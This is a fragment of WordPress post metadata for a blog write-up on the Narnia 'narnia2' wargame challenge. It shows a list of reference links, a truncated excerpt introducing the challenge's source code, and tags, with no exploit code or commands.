data-id=\"2980dc9\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-2b26eae elementor-widget elementor-widget-text-editor\" data-id=\"2b26eae\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><a href=\"https:\/\/stackoverflow.com\/questions\/32455684\/difference-between-real-user-id-effective-user-id-and-saved-user-id\">https:\/\/stackoverflow.com\/questions\/32455684\/difference-between-real-user-id-effective-user-id-and-saved-user-id<\/a><\/p>\n<p><a href=\"https:\/\/man7.org\/linux\/man-pages\/man2\/setreuid.2.html\">https:\/\/man7.org\/linux\/man-pages\/man2\/setreuid.2.html<\/a><\/p>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/43716\">https:\/\/www.exploit-db.com\/exploits\/43716<\/a><\/p>\n<p><a href=\"https:\/\/faculty.nps.edu\/cseagle\/assembly\/sys_call.html\">https:\/\/faculty.nps.edu\/cseagle\/assembly\/sys_call.html<\/a><\/p>\n<p><a href=\"http:\/\/shell-storm.org\/shellcode\/index.html\">http:\/\/shell-storm.org\/shellcode\/index.html<\/a><\/p>\n<p><a href=\"https:\/\/www.cs.virginia.edu\/~evans\/cs216\/guides\/x86.html\">https:\/\/www.cs.virginia.edu\/~evans\/cs216\/guides\/x86.html<\/a><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>As usual, we meet again for the 3rd challenge of this Narnia series. We are going to discover a new tool that is essential for the challenge, and also deepen knowledge covered in the previous challenges. 
Discovery Here is the source code of the narnia2 program: #include #include #include int main(int argc, char * argv[]){ char buf[128];&hellip; <br \/> <a class=\"button small blue\" href=\"https:\/\/mindshield.eu\/index.php\/2023\/03\/06\/narnia-2\/\">Read more<\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[8,10,9],"class_list":["post-554","post","type-post","status-publish","format-standard","hentry","category-narnia_challenges","tag-challenge","tag-exploit","tag-shellcode"],"_links":{"self":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts\/554","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/comments?post=554"}],"version-history":[{"count":5,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts\/554\/revisions"}],"predecessor-version":[{"id":724,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts\/554\/revisions\/724"}],"wp:attachment":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/media?parent=554"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/categories?post=554"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/tags?post=554"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}